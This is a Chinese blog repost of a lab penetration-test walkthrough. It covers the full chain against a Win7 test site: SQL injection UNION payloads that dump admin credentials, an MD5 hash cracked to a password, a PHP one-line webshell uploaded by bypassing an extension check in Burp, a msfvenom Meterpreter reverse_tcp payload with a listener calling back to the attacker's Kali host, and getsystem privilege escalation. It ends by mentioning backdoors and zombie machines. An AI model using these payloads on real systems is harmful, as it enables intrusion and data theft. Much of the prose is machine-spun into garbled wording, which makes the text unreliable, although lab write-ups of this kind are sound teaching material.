模拟网站渗透测试最终实现提权的全部过程

2023-02-19 0 1,063

序言

许多安全可靠人新进阶时,都须要在某一的试验场展开自学,那时胡先生给我们找了一则有关中文网站拿webshell的全数操作方式过程。总之了,该文中大部份的操作方式都是如前所述试验场展开了,爸爸妈妈能找有关的单元试验,但一千万不对真实世界的中文网站展开反击。

预备组织工作

舰载机(被反击方):win7控制系统

侵略者(反击方):win10控制系统、kali控制系统

具体来说开启win7控制系统,构筑两个常用的大学校园中文网站,接着态射到以太网,使他们能恒定出访。

模拟网站渗透测试最终实现提权的全部过程

从中文网站领到webshellsql转化成安全可靠漏洞

把整座中文网站下载完两遍后,他们辨认出这儿的url为?id=10开头,他们揣测可能将是两个sql转化成点。

模拟网站渗透测试最终实现提权的全部过程

具体来说他们在id=10前面加之两个下划线’展开推论。

模拟网站渗透测试最终实现提权的全部过程

那个这时候他们辨认出回显的统计数据不正常,只好他们再加两个注解记号。

模拟网站渗透测试最终实现提权的全部过程

辨认出统计数据那个这时候回显的这时候是恒定的,到这一步他们已经能确定这儿存在两个sql转化成安全可靠漏洞。

原理他们能简单解释一下 在中文网站中,他们一般使用统计数据库存储中文网站统计数据,中文网站和统计数据库是存在两个交互性。中文网站所呈现的内容是由代码中写入的sql语句调用统计数据库中的内容展开两个呈现,例如他们刚刚看到的文字。 而sql转化成安全可靠漏洞一般是由于程序员书写的sql语句不规范所导致的安全可靠事件。

例如中文网站源码中使用如下的sql语句展开查询。

模拟网站渗透测试最终实现提权的全部过程

给语句开头的where查询条件加之两个下划线’。

模拟网站渗透测试最终实现提权的全部过程

很显然,他们传入的下划线和前面的下划线闭合,前面只有两个无法成对的下划线,接着报了语法错误。

那个这时候他们再加之–+注解记号注解掉前面的下划线。

模拟网站渗透测试最终实现提权的全部过程

那个这时候查询的统计数据就会正确回显出来。

原理简单解释了一下之后,他们回到刚刚的中文网站。

那个这时候他们辨认出存在sql转化成安全可靠漏洞之后,他们就开始展开查询对方中文网站统计数据库的统计数据,找到一些敏感信息,例如管理员的账号密码等等。

具体来说,他们使用order by语句快速猜解出表中的列数。

模拟网站渗透测试最终实现提权的全部过程

辨认出10列的这时候报错,说明不足10列,他们继续缩小范围。

模拟网站渗透测试最终实现提权的全部过程

再查询第8列的这时候,辨认出统计数据回显正确,说明对方表中含有列数8

他们使用union select 自定义查询试验一下,zhu意他们这儿前面的id=10,要写成id=-10,把这儿的查询置空。

模拟网站渗透测试最终实现提权的全部过程

辨认出会分别回显第三列、第五列和第七列。接下来他们就能在三、五、七处做做文章。

查询统计数据库名字:

http://192.168.1.167/yxlink/tuku/images.php?id=-10 union select 1,2,database(),4,5,6,7,8–+

模拟网站渗透测试最终实现提权的全部过程

得到统计数据库名字:qzn_zuiai

查询统计数据库中的表名:

http://192.168.1.167/yxlink/tuku/images.php?id=-10 union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=”qzn_zuiai”–+

模拟网站渗透测试最终实现提权的全部过程

得到一共se2admin,se2fl,se2hd,se2nr,se2tufl,se2tunr,se2wz,se2zf,sj3sk九张表

通过表名,他们揣测se2admin可能将是存储管理员账号和密码的表,所以他们先查询这张表中的统计数据

查询表se2admin中的字段:

http://192.168.1.167/yxlink/tuku/images.php?id=-10 union select 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name=”se2admin”–+

模拟网站渗透测试最终实现提权的全部过程

得到表中的字段值有id,name,pass等,接下来他们查询name和pass的字段值。

查询字段值:

http://192.168.1.167/yxlink/tuku/images.php?id=-10 union select 1,2,name,4,pass,6,7,8 from se2admin–+

模拟网站渗透测试最终实现提权的全部过程

他们得到管理员账号:admin,管理员账号密码:

7fef6171469e80d32c0559f88b377245

很显然密码值是被加密的md5值,所以他们去网上找md5中文网站展开撞库查询。

模拟网站渗透测试最终实现提权的全部过程

得到管理员密码为:admin888

接下来他们须要查找那个中文网站的后台地址,他们使用御剑展开两个扫描。

模拟网站渗透测试最终实现提权的全部过程

御剑爆出了许多敏感地址,他们找到两个admin的目录,可能将是后台地址,他们去出访一下。

模拟网站渗透测试最终实现提权的全部过程

输入他们刚刚得到的管理员账号和密码admin:admin888。

模拟网站渗透测试最终实现提权的全部过程

那个这时候,他们成功进入对方中文网站后台。

文件上传安全可靠漏洞

接下来他们再这儿找到两个文件上传点。

模拟网站渗透测试最终实现提权的全部过程

他们写两个简单的一句话木马。

模拟网站渗透测试最终实现提权的全部过程

考虑到这儿可能将会对他们上传的文件展开两个后缀限制,例如只能上传jpg或者png图片格式文件等,所以他们把muma.txt改成muma.jpg格式。

模拟网站渗透测试最终实现提权的全部过程

他们开启burpsuite,接着点提交,拦截到他们发送的统计数据包。

模拟网站渗透测试最终实现提权的全部过程

他们把muma.jpg改回php文件类型:muma.php。

模拟网站渗透测试最终实现提权的全部过程

接着发送统计数据包。

模拟网站渗透测试最终实现提权的全部过程

ok,已经上传成功,他们去找找他们上传后的路径。

模拟网站渗透测试最终实现提权的全部过程

得到他们的上传完整路径为:http://192.168.1.167/yxlink/img/img_3699336993.php

他们使用蚁剑展开连接他们上传的木马。

模拟网站渗透测试最终实现提权的全部过程

成功连接,进入到对方服务器。

模拟网站渗透测试最终实现提权的全部过程

到此,已成功领到webshell。

反弹shell连接

接下来他们利用kali的msf制作两个exe类型的反弹型木马。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的ip LPORT=端口 -f 类型 -o 文件名

模拟网站渗透测试最终实现提权的全部过程

把做好的木马,通过他们蚁剑刚刚连接的webshell展开上传。

模拟网站渗透测试最终实现提权的全部过程

模拟网站渗透测试最终实现提权的全部过程

上传成功后,他们在kali开启msf。

模拟网站渗透测试最终实现提权的全部过程

执行监听

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.131 set lport 4444 exploit

模拟网站渗透测试最终实现提权的全部过程

执行木马

msf开启监听之后,他们去蚁剑webshell执行他们上传的木马。

模拟网站渗透测试最终实现提权的全部过程

执行之后,回到kali,他们能看到msf目标正在回连,创建Meterpreter会话成功。

模拟网站渗透测试最终实现提权的全部过程

提权

具体来说查看一下他们的用户权限。

辨认出是普通用户权限,之前他们已经在webshell观察到对方是win7控制系统,所以他们采用的是windows的载荷反击

他们尝试使用getsystem展开提权试试。

模拟网站渗透测试最终实现提权的全部过程

辨认出直接提权成功,现在他们拥有windows最高权限system。

接下来他们打印一下控制系统信息,并且拍照对方电脑现在状态。

模拟网站渗透测试最终实现提权的全部过程

模拟网站渗透测试最终实现提权的全部过程

ok,成功。

结语

在领到system权限之后,他们能干许多许多的事…例如给对方种下后门,拿来当肉鸡等等… …

这告诉他们开发中文网站必须注重安全可靠,否则带来的后果是无穷大的。

作者:dotast 原文地址:https://www.freebuf.com/articles/web/290214.html

再次声明:本头条号所分享内容仅用于网安爱好者之间的技术讨论,禁止用于违法途径,!否则需自行承担,本头条号及原作者不承担相应的后果.

相关文章

发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务